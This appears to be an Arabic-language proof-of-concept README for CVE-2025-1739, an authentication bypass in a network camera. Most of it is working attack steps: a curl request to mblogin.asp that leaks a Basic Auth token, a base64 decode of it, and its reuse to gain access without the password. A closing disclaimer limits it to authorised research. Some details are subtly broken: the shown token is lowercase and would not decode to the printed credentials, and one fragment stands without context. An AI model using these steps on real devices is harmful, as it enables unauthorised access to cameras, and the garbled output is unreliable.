
0day PoC for CVE-2025-1739
| CVE | CVSS v3.1 | النتيجة | CWE | النوع |
|---|---|---|---|---|
| CVE-2025-1739 | AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N | 7.1 | CWE-288 | تجاوز المصادقة عبر تسريب بيانات Basic Auth |
تسرّب الكاميرا رمز مصادقة Basic صالحًا ومشفّرًا بـ Base64 عبر نقطة النهاية mblogin.asp. يمكن فك ترميز هذا الرمز بسهولة وإعادة استخدامه للوصول غير المصرح به إلى الجهاز — دون الحاجة إلى معرفة كلمة المرور.
curl -u admin:whatever http://<CAMERA_IP>:<PORT> --request-target en/mobile/mblogin.asp
يحتوي الرد على رمز مصادقة Basic صالح:
ywrtaw46vw5ndwvzc2fibguxmjmh
echo "ywrtaw46vw5ndwvzc2fibguxmjmh" | base64 -d
# Output: admin:unguessable123!
curl -H "Authorization: Basic ywrtaw46vw5ndwvzc2fibguxmjmh" http://<CAMERA_IP>:<PORT>/
activex_pal.asp و mblogin.asp.هذا المستودع مخصص للأغراض التعليمية والبحث الأمني المصرح به فقط. المؤلفون غير مسؤولين عن أي إساءة استخدام. احصل دائمًا على إذن صريح قبل اختبار أي جهاز.